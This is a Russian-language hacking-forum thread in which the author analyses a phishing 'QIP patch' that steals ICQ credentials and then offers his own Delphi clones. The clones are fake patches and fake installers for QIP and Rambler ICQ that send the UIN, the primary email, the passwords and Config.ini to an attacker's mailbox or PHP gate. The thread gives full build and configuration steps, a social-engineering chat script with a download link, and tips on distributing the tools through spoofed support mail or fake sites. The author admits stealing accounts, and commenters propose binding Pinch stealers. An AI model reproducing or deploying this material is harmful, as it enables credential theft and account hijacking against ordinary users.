К написанию данной статьи меня побудил случай отсылки на мой адрес электронной почты одного письма. Какого письма? Вероятно, такие письма вам всем знакомы. Они часто могут приходить от якобы знакомого человека, которого вы забыли, действительно знакомого вам человека либо службы техподдержки. Обычно там предложение, ведущее к СПАМу, либо вложение-вирус. Такое письмо пришло и на мой почтовый ящик, кстати их у меня около 30 (совместно с бесплатными хостингами), но именно этот - примари к шестизначному ICQ. В письме ([email protected]) содержался текст, от якобы службы технической поддержки QIP (я этим клиентом пользуюсь!), гласивший о внезапно обнаруженной уязвимости в клиенте, позволяющей похитить учётные данные. Якобы всем, кто не поставит вложенный здесь патч и не зарегистрирует его онлайн, грозит потеря номера ICQ. Это письмо выглядело очень убедительно. Естественно патч я скачал. И запустил… на совсем другом компьютере, который у меня для теста, с QIP, Интернет и номером ICQ. И ничего не произошло. Никакой активности проги в лазании по реестру, файлам и Интернет я не обнаружил. Просто появилась совсем обычная форма программы - мастера обновления QIP наподобие этой: Выглядело это также убедительно. Но некоторые подозрения сразу возникли у меня после продолжения работы с этим «мастером». Как видно из скриншота, мастер запрашивает некоторые довольно интересные данные. Хотя это ведь объясняется необходимостью «проверки» на уже произошедшее использование кем-либо «уязвимости», а также необходимостью «регистрации» патча на узле QIP. Этому бы многие могли поверить. Нажимаем на «Далее» и снова ничего особого не происходит, только сменяется окно мастера: Нам предлагают проверить введённые данные, и позаботится о подключении к Интернет. И есть кнопочка «Начать». Вот тут самое интересное. При нажатии на эту кнопочку программа наконец-то лезет в Интернет, однако эту потребность она нам объяснила. А вот лезет то она как? Через почтовый протокол она отправляет данные на адрес почты [email protected]. Отправляет наши данные. Введённый UIN, примари-мэил и пароли к ним. А также файл Config.ini, как вложение. И в завершение всего нам показывается радостное окно о завершении обновления и рядом с файлом qip.exe создаётся крупная dll с мусором, чтоб было видно, что мастер работал не зря. Итак, вот был описан один интересный способ нападения на аськодержателя, осуществлённый кем-то в отношении меня и мной исследованный. Теперь собственно сама статья, или точнее – ее вторая часть. Спросим у себя: что нам мешает применять подобный метод? И скажем – ничего. Метод очень прост и для осуществления требует минимальные познания в программировании. Я постарался воспроизвести наиболее точно все диалоговые окна, которые видел в том мастере в своей версии такой программы. Моя программа, исходники которой здесь, позволяет делать всё, что описано выше. Кроме того есть вариант программы с отправкой данных не на почту, а на веб-сервер со специальной php-страничкой (пример кода php тоже есть). Все исходники богаты комментариями, предназначены как для практической отработки этого метода СИ, так и в учебных целях (программирование на Delphi). Распространять этот мастер можно посредством почты - от адреса службы техподдержки, можно как бы по-знакомству через ICQ. Описание СИ в применении к почте есть здесь: http://forum.antichat.ru/thread10865.html. Недостатки вариантов программ, исходники которых я представил: С отправкой через почту: 1. Под некоторые почтовые серверы нужна авторизация. Хотя это и предусмотрено, но проблемы могут быть все равно. Настраивал и проверял под почтовик tut.by, с ним точно проблем нет. То есть сервер - mail.tut.by, адрес заводите там же любой свободный @tut.by. 2. Пользователь, который получит прогу, может выходить в Интернет только через прокси-сервер, что не предусмотрено в моей программе. С отправкой на веб-сервер: 1. Нужен веб-сервер с php. 2. У пользователя может быть не настроен Internet Explorer для выхода в Интернет. Имея исходники каждый желающий может поменять патч так, чтобы он был под ICQ5, &RQ, RamblerICQ. Сам я уже тестово увёл пару номерков этим методом. Например так: ……… хек (17:22:31 22/01/2007) кстати тут недавно мою аську атаковали (у меня квип) и номер почти украли, я ж патч не скачивал там один, так вот и заюзали хацкеры сплоит и уже примари мыло сменили, вовремя заметил я, а так бы всё ламар (17:23:11 22/01/2007) у меня тож квип хек (17:23:37 22/01/2007) хехе, тогда прощай номер, уведут тысчу таких как у тебя для спама и всё! хек (17:24:06 22/01/2007) я так счас патчанул квип и спокоен пока новую уязвимость не найдут ламар (17:24:10 22/01/2007) а что сделать хек (17:24:34 22/01/2007) вообще есть патч, чтоб закрыть дыру ламар (17:24:53 22/01/2007) а где взять хек (17:24:55 22/01/2007) у тебя какая версия квип? ламар (17:25:23 22/01/2007) 2005 хек (17:25:27 22/01/2007) Вот ссылка: http://slil.ru/23795961/69649485/QIP_7981_Patch.exe ламар (17:25:53 22/01/2007) спс! Цель данной небольшой статьи - осветить такую СИ для предупреждения и рассмотреть и дать инструмент для использования. PS: Похожих статей я на antichat не нашёл, если идея не нова или не интересна – строго не судите, нужную критику говорите. Это моя первая статья такого плана. Авторские права на всё, кроме концепции метода СИ мои. Для несведущих в программировании на Delphi - проконсультирую, обращаться в личку. _________________ Добавление: Вот переделанная под вид RamblerICQ версия проги. Эта версия для отправки отчёта по http. Там приложен и файл php для приёма отчётов сервером и скомпилированная версия, в которой, посредством любого редактора ресурсов, можно изменить адрес сервера приёма отчётов на свой.
Что-то я не встречал официальных обновлений клиентов Icq, всегда только новая версия с официального сайта или из доверенных источников дистр. P.s. Может быть расчитано только на ламаков. Особенно бросается в глаза то что надо вводить пассы аськи и примари мыла, (улубнуло патчевание)ну а вообще СИ на них и расчитана + всё равно за статью и исходник.
Вот в продолжение к статье и примеру, по просьбам людей, следующее дополнение: Это инсталлятор QIP, инсталлирующий QIP, который не является настоящим, а всего лишь муляж, отправляющий в ходе "попытки авторизации" имя пользователя и пароль на заданный адрес почты. Скачать здесь архив с исходниками, готовыми приложениями и инструкцией. Инструкция по сборке ненастоящего инсталлятора подложного QIP. В архиве находится: - в папке QIP_Installer находиться подложный инсталлятор квипа; - в папке QIP_Pager находиться подложный квип. Действия по сборке: 1) Если есть полный компилятор Дельфи и возможность самому компилировать и редактор ресурсов ( напр. Restorator); 2) Если еть редактор ресурсов (Restorator, ResHacker) и умение работы с ним. 1. Берём и открываем в Дельфи проект из QIP_Pager. Далее в Unit1.pas, в resourcestring указываем, как там подписано: -адрес, на который вы хотите принимать данные: mailadres='[email protected]'; -почтовый сервер на который будет производиться отправка: mailserver='mail.tut.by'; -нужна ли авторизация на том сервере mailserver: false or true: enableauth='false'; -имя пользователя для авторизации на mailserver: username='someusername'; -пароль пользователя для авторизации на mailserver: password='somepassword'. Компилируем. Потом закрываем проект и открываем проект из QIP_Installer. Там в Unit1.pas пишем номер псевдоверсии квипа: resourcestring ver_qip='80хх'; хх-любое актуальное значение, сейчас хх=20. Компилируем. Закрываем Дельфи. Открываем с помощью Restorator полученный при компиляции файл-экзеху и находим там ресурсную директорию RCData, а в ней ресурс DATA. Берём копируем в проводнике файл подложной экзехи-квипа из QIP_Pager и вставляем в рестораторе в ресурс DATA, и закрываем Restorator с сохранением изменений. 2. Открываем в рестораторе готовую экзеху из папки QIP_Pager и находим в директории ресурсов String ресурс 4075. В нём правим на нужные нам значения, аналогично настройкам почты в (1) следующие строки: 65195 (адрес почты приёма), 65196 (почтовый сервер), 65197 (нужна ли авторизация - true/false), 65198 (имя пользователя для авторизации), 65199 (пароль к имени пользователя для авторизации). Далее открываем в рестораторе готовую экзеху из QIP_Installer и находим в директории ресурсов String ресурс 4079. В нём указываем номер версии псевдоквипа в строке 65252. Потом находим в этой же проге ресурсную директорию RCData, а в ней ресурс DATA. Берём копируем в проводнике файл подложной экзехи-квипа из QIP_Pager и вставляем в ресурс DATA. Закрываем Restorator с сохранением изменений. Заключение. Придумываем подходящее имя инсталлятору. И всё готово. Следует отметить, что способ этот (в принципе) отправляет данные на почту и не у всех сработает (например, если доступ в Интернет у жертвы осуществляется только через прокси). Данный способ и продукты были предложены лишь в качестве примера возможной СИ-атаки на ICQ-пользователя QIP и не предназначены для описанных действий, наоборот, автор не одобряет такие действия и за последствия использования этого метода ответственности не несёт. Авторские права на эту статейку с описанием сборки продукта, а также на сам продукт мои. Автор идеи - MC_Brute.
Прошу меня извинить,просто хочу напомнить ,что один из пользователей этой темы с WHACK =) и очень в близком общении с админом этого портала.(те кто видел тему в болталке,поймут к чему я клоню) По теме ,а именно пост от begin end .... я только хотел спросить,кому ты впаришь QIP 8020 если умный человек зайдет на офф сайт...а если ламер,то у него и ася ламерская будет....но вообще спасибо =)
GatesDeBill, Google в таких случаях неплохо помогает: - ResHacker; - Restorator; - О работе с Restorator. Уважаемый RemaerD. QIP 8020 можно впарить (к примеру) через фейк оффициального сайта, к которому данный продукт меня и попросили сделать. Кстати (по данному методу у меня) уже есть результаты, правда не шестизнаки. Но думаю, каждому ламеру найдётся по методу (тем более, что даже системой восстановления оные пользоваться не умеют) В продолжение: Вот (1,04 Мб) сделал ещё версии псевдо-патча и псевдо-инсталлера для клиентов Rambler ICQ и QIP, отправляющие данные на почту и веб-сервер соответственно (в отличие от прежних версий). Таким образом суммарно в этой теме имеются: Псевдо-патчи к Rambler ICQ и QIP с отправкой данных как на почту, так и на веб-сервер (для каждого вида). Псевдо-инсталлеры QIP с отправкой данных тоже на почту и на веб-сервер. Естественно, что всё с комментариями и исходниками.
нах это жуткое палево с вводом пасса к уину, если можно заинфектить бинарник клиента кодесом, который будет снифать трафф путём хукинга send() в ws2_32.dll, и отправлять добытые данные на гейт
Begin end, метод конечно красивый... Но если жертва открывает наш экзешник, какая нафих разница, что в этом экзешнике? В любом случае с ехе можно склеить пинч или аналогичное...
Да способ хорош, если чуть-чуть дороботать будет вообще супер. Очень большое доверие вызывает сам интерфейс программы, только поля ввода уина, пароля и примари явно надо убрать.
Уважаемые Cr4sh и Lizardman. Это просто метод, большей частью основанный на СИ. Ввиду довольно простого исполнения, думаю, особенно для неспециалистов в кодинге, он достаточно актуален. Вот ко мне обращались за советами по его осуествлению многие. А первоначально я просто описывал метод с патчем, т.к. его кто-то попробовал в применении ко мне. Т.е. я не автор этих идей - я только их публикатор и реализатор. Согласен, что пинч кому-то будет проще и надёжнее.
Begin end, сори, если написал слишком резко) Идея- на 5 с плюсом. Просто лично у меня всегда главной трудностью было заставить чела принять ехешник.
